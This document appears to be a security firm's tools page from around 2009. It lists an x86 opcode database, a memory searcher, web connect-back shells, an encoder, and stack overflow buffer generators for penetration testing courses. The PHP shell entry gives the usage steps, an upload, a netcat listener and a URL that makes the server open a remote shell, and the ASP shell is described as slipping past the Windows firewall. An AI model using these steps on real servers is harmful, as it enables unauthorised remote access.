Grayscale ASM Database
Source: Grayscale Research
The Grayscale Assembly DB is a one of a kind online searchable database of all intel instructions, searchable by opcode, name, and various other parameters. This tool was built 100% from scratch to assist in building the Grayscale disassembly engine, but was found to be so useful that it was developed fully into its own tool.
Opcode DB DBFile
Source: Grayscale Research 2009
Due to popular request, here is the mysql .sql file used for the opcode database. It can be used to create your own intel x86 disassembler without too much hubub. The grayscale research proprietary x86 disassembler/decoder was written by using a script which generated a b-tree representation of this database. This file was inputted by hand directly from the Intel Software Developers Manuals vol 2 and 3 and took the near collapse of Jasons carpal tunnels to do. So yah, appreciate it.
GSSearchMem
Source: Grayscale Research 2009
A Linux (or other *nix) PTRACE based memory searching utility that supports per-process searching for user supplied memory patterns. Also has built in features to support loading binaries, pausing them, and searching. This tool is useful for finding static jmp/call combinations in running processes.


Key Features:
-j flag for automatic searching for jmp/call/ret instructions which simplify exploitation on a Linux ASLR platform.
-p dumps a processes maps to stdout.
-f loads a process from a /bin/path then provides an interactive map selection.
Grayscale PHP Connect Back Shell Utility 1.1
Source: Grayscale Research
This tool is useful specificially for penetration tests which include LAMP/WAMP servers. Upload this script to a remote host with file upload, locate script, and set up an accessable listening socket.

Set Up Listener (any port can be used):
nc -l -p 777

Then invoke the page as follows:
http://website/php_connectback.php?host=connectbackipaddress&port=777


This will use the php engine to connect back to the host and allow for a shell to be spawned remotely using just PHP.
Grayscale ASP CBShell
Source: http://www.grayscale-research.org/new/code/connect_back.aspx
This tool is a compliment to the grayscale PHP CB shell, but written for ASP .NET servers. It utilizes the built in socket functionality of VB in order to establish an outbound shell connection from the server. This has the advantage of not causing an alert through the Windows builtin firewall. This was tested on IIS6.0 and Apache Tomcat w/ mod_aspdotnet.
Grayscale String Encoder Utility
Source: Grayscale Research
This encoder was written to be used during penetration testing/software auditing to provide a wealth of string encoders from the command line. The binary itself is very small and depends solely on libc. Compiles in Windows and Linux fine.
Help:
./convert -h

Mysql Usage:
./convert -mx ConvertStrToMySQL_0x
./convert -mc ConvertStrToMySQL_CHAR()

MSQL Usage:
./convert -sc ConvertStrToMSQL_CHAR()

C encoding:
./convert -c ConvertStrToCEscape

Web Attack Usage:
./convert -x ConvertStrToXSS
./convert -u8 ConvertStrToUTF8

Intel ASM Encode:
./convert -as ConvertStrToASM
./convert -ia ConvertStrToInlineASM

GSRet2EaxGen
Source: Grayscale Research 2009
This tool was developed as part of our PT301 Advanced Penetration Testing course to assist with the generation of ret2eax SmackTheStack styled overflows. It will generate a string which when given the proper parameters, will partially automate the generation of ret2eax overflows on the Linux 2.6 ASLR platform.
GSRet2EspGen
Source: Grayscale Research 2009
This tool aims to partially automate the process of generating buffers which are utilized in the ret2esp style overflow attack documented by Izik Koetler in the paper "Smack the Stack". This tool was developed for the Advanced Penetration Testing 301 class, check the Training section for enrollment details.
x86 Indirect Jmp Call References
Source: Grayscale Research 2009
This simple tool was built to demonstrate the opcode formatting of Intel x86 indirect jmp/calls by providing a runtime generated table of the opcodes. Its useful simply as a reference when performing application modifications on any x86 platform, or during exploit generation on any x86 platform.
GSHexStrGen
Source: Grayscale Research 2009
This tool is an alternative to having to generate strings in the old "perl -e print("a"x100);" style. It allows you to generate a string on the command line that can be easily piped out to a file from a supplied hex string.